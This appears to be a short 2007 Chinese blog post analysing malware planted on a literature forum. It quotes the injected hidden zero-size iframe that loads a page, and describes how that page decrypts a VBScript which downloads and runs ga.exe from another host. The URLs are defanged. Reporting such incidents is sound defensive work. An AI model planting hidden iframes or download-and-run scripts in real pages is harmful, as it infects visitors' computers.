文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
endurer 原创
2007-08-22 第1版
上回妯现挂的是 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
刚才一不小心又进去了,卡巴没反应~
一位刚进去的网友说瑞星发现、并清除了三个 Worm.Win32.Agent.imh,都在IE缓存里,文件名是 ga[1].exe之类。
检查论坛代码,发现:
/---
<iframe src="hxxp://www.yo*y*o5**9.com/m*68.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.yo*y*o5**9.com/m*68.htm?id=907 包含脚本代码,功能是使用自定义算法解密并输出变量 S 的值。
解密后的变量 S 的值 为 VBScript 脚本,功能是下载 hxxp://x***xt*vb.cn/arp/ga.exe 并运行。
不过我这无法下载 ga.exe,难怪卡巴没反应。